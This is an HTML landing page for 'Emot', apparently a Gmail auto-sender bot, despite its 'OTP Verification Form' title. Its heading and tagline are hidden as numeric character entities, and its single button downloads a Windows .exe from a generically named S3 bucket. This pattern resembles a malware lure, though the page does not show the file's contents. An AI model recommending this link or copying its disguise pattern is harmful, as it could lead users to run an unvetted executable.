<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>EMOT OTP Verification Form</title>
  <link rel="stylesheet" href="../static/css/css/style.css">
  
</head>
<body>

  <main>
    <div class="main">
        <header>
            <div class="logo2">
                <a href="#">
                    <img src="../static/img/EMOT.PNG" alt="Device Master Logo">
                </a>
            </div>
        

         
        </header>
        <div class="banner">
            
            <div class="banner-left">
                <div class="center">
                    <h1>&#83;&#101;&#116;&#32;&#117;&#112;&#32;&#69;&#109;&#111;&#116;&#32;&#116;&#111;&#32;&#97;&#117;&#116;&#111;&#109;&#97;&#116;&#105;&#99;&#97;&#108;&#108;&#121;&#32;&#115;&#101;&#110;&#100;&#32;&#101;&#109;&#97;&#105;&#108;&#115;&#32;&#102;&#111;&#114;&#32;&#121;&#111;&#117;&#46;&#10;
                    </h1>
                    <p>&#65;&#117;&#116;&#111;&#32;&#115;&#101;&#110;&#100;&#101;&#114;&#32;&#98;&#111;&#116;&#32;&#102;&#111;&#114;&#32;&#71;&#109;&#97;&#105;&#108; </p>

                  <a href="https://geektemplate123456.s3.eu-north-1.amazonaws.com/software/Emot_Demo.exe"><button>Download Free Trial</button></a>
                    <div class="img-logo">
                        <img src="../static/img/windows-compat.png"
                            alt="">
                    </div>
                </div>
            </div>
            <div class="banner-right">
                <div class="img">
                    <img src="../static/img/Gmail-Sender.png" alt="Computer image">
                </div>
            </div>
        </div>
</main>
</body>
</html>